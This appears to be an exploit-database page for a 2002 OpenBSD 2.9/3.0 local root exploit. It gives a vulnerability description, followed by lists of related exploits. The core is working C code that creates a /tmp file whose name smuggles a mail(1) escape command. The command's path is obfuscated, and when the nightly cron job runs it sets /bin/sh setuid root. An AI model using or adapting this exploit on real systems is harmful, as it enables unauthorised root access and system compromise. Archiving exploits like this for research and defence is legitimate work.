Menu

Search for hundreds of thousands of exploits

"OpenBSD 2.9/3.0 - Default Crontab Root Command Injection"

Author

Exploit author

"Przemyslaw Frasunek"

Platform

Exploit platform

openbsd

Release date

Exploit published date

2002-04-11

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/*
source: https://www.securityfocus.com/bid/4495/info

OpenBSD ships with a number of cron jobs configured by default. The tasks are for the purpose of summarizing system information.

The mail(1) utility is used to send the summaries to the root user. This utility supports escaped characters in message text indicating commands to be executed during processing.

If attacker-supplied data can be included in the message text passed to mail(1), commands specified by the attacker may be executed as root. If the attacker embeds the escape sequence followed by an arbitrary command in this data, the commands will be executed as root when the cron task runs. It is possible for an attacker to embed data in filenames, which are included in the emails. 
*/

/*
 * (c) 2002 venglin@freebsd.lublin.pl
 *
 * OpenBSD 3.0 (before 08 Apr 2002)
 * /etc/security + /usr/bin/mail local root exploit
 *
 * Run the exploit and wait for /etc/daily executed from crontab.
 * /bin/sh will be suid root next day morning.
 *
 * Credit goes to urbanek@openbsd.cz for discovering vulnerability.
 *
 */

#include <fcntl.h>

int main(void)
{
        int fd;

        chdir("/tmp");
        fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);

        if (fd)
                close(fd);
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-02-26 "OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution" remote openbsd "Qualys Corporation"
2019-12-30 "OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)" local openbsd Metasploit
2019-12-16 "OpenBSD 6.x - Dynamic Loader Privilege Escalation" local openbsd "Qualys Corporation"
2018-11-30 "xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation" local openbsd "Marco Ivaldi"
2018-10-30 "xorg-x11-server 1.20.3 - Privilege Escalation" local openbsd "Marco Ivaldi"
2017-06-28 "OpenBSD - 'at Stack Clash' Local Privilege Escalation" local openbsd "Qualys Corporation"
2017-02-07 "OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service" dos openbsd PierreKimSec
2009-04-14 "OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service" dos openbsd nonroot
2009-04-13 "OpenBSD 4.5 - IP datagrams Remote Denial of Service" dos openbsd Rembrandt
2008-07-01 "OpenBSD 4.0 - 'vga' Local Privilege Escalation" local openbsd "lul-disclosure inc."
Release Date Title Type Platform Author
2009-10-08 "FreeBSD 7.2 - VFS/devfs Race Condition" local freebsd "Przemyslaw Frasunek"
2009-10-08 "FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition" local freebsd "Przemyslaw Frasunek"
2009-08-24 "FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation" local freebsd "Przemyslaw Frasunek"
2009-08-14 "Linux Kernel 2.x - 'sock_sendpage()' Local Privilege Escalation (4)" local linux "Przemyslaw Frasunek"
2005-06-28 "Solaris 9/10 - 'ld.so' Local Privilege Escalation (2)" local solaris "Przemyslaw Frasunek"
2005-06-28 "Solaris 9/10 - 'ld.so' Local Privilege Escalation (1)" local solaris "Przemyslaw Frasunek"
2005-06-24 "Sun Solaris 10 Traceroute - Multiple Local Buffer Overflow Vulnerabilities" local solaris "Przemyslaw Frasunek"
2003-12-20 "Tcpdump 3.x - L2TP Parser Remote Denial of Service" dos linux "Przemyslaw Frasunek"
2002-04-11 "OpenBSD 2.9/3.0 - Default Crontab Root Command Injection" local openbsd "Przemyslaw Frasunek"
2001-12-18 "ZYXEL Prestige 681 SDSL Router - IP Fragment Reassembly" remote hardware "Przemyslaw Frasunek"
2001-09-17 "FreeBSD 4.3/4.4 - Login Capabilities Privileged File Reading" local freebsd "Przemyslaw Frasunek"
2001-04-21 "Mercury/NLM 1.4 - Buffer Overflow" dos multiple "Przemyslaw Frasunek"
1999-08-31 "Martin Stover Mars NWE 0.99 - Local Buffer Overflow" local linux "Przemyslaw Frasunek" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected